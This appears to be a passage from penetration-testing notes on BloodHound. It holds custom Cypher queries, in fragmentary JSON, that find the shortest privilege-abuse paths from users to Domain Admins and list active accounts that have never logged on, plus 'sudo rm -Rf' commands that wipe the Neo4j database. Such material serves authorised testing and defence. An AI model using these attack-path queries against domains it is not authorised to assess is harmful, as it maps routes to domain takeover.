"query": "MATCH (n:User),(m:Group {name:{result}}),p=shortestPath((n)-[r:MemberOf|HasSession|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(m)) RETURN p",
"allowCollapse": true,
"endNode": "{}"
"name": "Most Exploitable Paths to DA",
"queryList": [{
"final": false,
"title": "Select a Domain Admin group...",
"query": "MATCH (n:Group) WHERE n.objectsid =~ {name} RETURN ORDER BY DESC",
"props": {
"name": "(?i)S-1-5-.*-512"
"final": true,
"query": "MATCH (n:User),(m:Group {name:{result}}),p=shortestPath((n)-[r:MemberOf|AdminTo|AllExtendedRights|AddMember|ForceChangePassword|GenericAll|GenericWrite|Owns|WriteDacl|WriteOwner|ExecuteDCOM|AllowedToDelegate|ReadLAPSPassword|Contains|GpLink|AddAllowedToAct|AllowedToAct|SQLAdmin*1..]->(m)) RETURN p",
"allowCollapse": true,
"endNode": "{}"
"name": "Find users that have never logged on and account is still active",
"queryList": [{
"final": true,
"query": "MATCH (n:User) WHERE n.lastlogontimestamp=-1.0 AND n.enabled=TRUE RETURN n "
Keep in mind that Bloodhound captures a 'snapshot' of the current state of Active Directory at the time of capture and as such results may change when captured again in the future.
Purging Neo4j Database
This will wipe the database of all data. Requires setting new credentials again on http://localhost:7474/browser/
sudo rm -Rf /etc/neo4j/data/databases/* data/transactions/*
sudo rm -Rf /etc/neo4j/data/transactions/*
Last updated
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